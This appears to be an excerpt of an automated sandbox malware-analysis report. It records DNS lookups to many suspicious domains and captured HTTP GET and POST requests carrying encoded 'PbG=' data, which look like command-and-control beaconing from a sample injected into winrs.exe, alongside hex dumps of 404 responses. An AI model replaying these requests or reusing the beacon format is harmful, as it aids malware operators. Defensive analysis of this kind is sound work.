        Source: global trafficHTTP traffic detected: GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.taketechai.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.297tamatest1kb.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&1X=S8wx1XUpNBuXlv_ HTTP/1.1Host: www.gipsytroya.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: winrs.exe, 00000004.00000002.12653934881.0000000008482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Widevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"
        Source: winrs.exe, 00000004.00000002.12653934881.0000000008482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","pat
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: www.seninbeniimikaf.buzz
        Source: global trafficDNS traffic detected: DNS query: www.eagleup.org
        Source: global trafficDNS traffic detected: DNS query: www.strategyvanguard.com
        Source: global trafficDNS traffic detected: DNS query: www.philippatston.com
        Source: global trafficDNS traffic detected: DNS query: www.stayvact.xyz
        Source: global trafficDNS traffic detected: DNS query: www.sleephygienist.org
        Source: global trafficDNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
        Source: global trafficDNS traffic detected: DNS query: www.jennarauten.com
        Source: global trafficDNS traffic detected: DNS query: www.taketechai.com
        Source: global trafficDNS traffic detected: DNS query: www.297tamatest1kb.com
        Source: global trafficDNS traffic detected: DNS query: www.99b6q.xyz
        Source: global trafficDNS traffic detected: DNS query: www.ytfunnels.com
        Source: global trafficDNS traffic detected: DNS query: www.hedieplastic.com
        Source: global trafficDNS traffic detected: DNS query: www.helpers-lion.online
        Source: global trafficDNS traffic detected: DNS query: www.doodstream.beauty
        Source: global trafficDNS traffic detected: DNS query: www.gipsytroya.com
        Source: global trafficDNS traffic detected: DNS query: www.5597043.com
        Source: global trafficDNS traffic detected: DNS query: www.drivemktg.co
        Source: global trafficDNS traffic detected: DNS query: www.dadayute.com
        Source: global trafficDNS traffic detected: DNS query: www.inform-you.com
        Source: unknownHTTP traffic detected: POST /nx20/ HTTP/1.1Host: www.strategyvanguard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enConnection: closeContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.strategyvanguard.comReferer: http://www.strategyvanguard.com/nx20/User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 37 52 49 78 2f 69 36 45 76 33 35 74 53 64 39 53 73 57 57 4f 44 59 6d 6e 64 6f 56 74 4b 72 2b 34 50 59 6d 72 41 70 65 4e 64 65 71 7a 65 63 73 73 54 46 4f 45 65 61 66 66 55 34 31 43 4c 7a 41 31 30 41 2b 4c 6d 53 4f 44 57 52 55 48 4b 51 2b 44 62 72 43 64 4a 70 4e 55 68 45 50 57 6e 59 5a 73 64 63 62 33 76 52 31 4b 37 2f 57 74 35 61 5a 37 4c 66 56 4b 6a 35 30 5a 33 65 48 79 2b 37 44 54 70 55 70 56 73 5a 59 42 64 6f 48 4d 72 65 4c 36 6f 46 48 74 44 44 34 55 48 4c 45 63 31 73 74 6e 50 35 75 66 38 59 58 50 77 62 61 57 41 4b 73 38 58 2f 44 2f 39 51 3d 3d Data Ascii: PbG=xt0DoIbItrTN7RIx/i6Ev35tSd9SsWWODYmndoVtKr+4PYmrApeNdeqzecssTFOEeaffU41CLzA10A+LmSODWRUHKQ+DbrCdJpNUhEPWnYZsdcb3vR1K7/Wt5aZ7LfVKj50Z3eHy+7DTpUpVsZYBdoHMreL6oFHtDD4UHLEc1stnP5uf8YXPwbaWAKs8X/D/9Q==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 09:58:45 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 09:58:48 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 09:58:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 09:58:54 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61
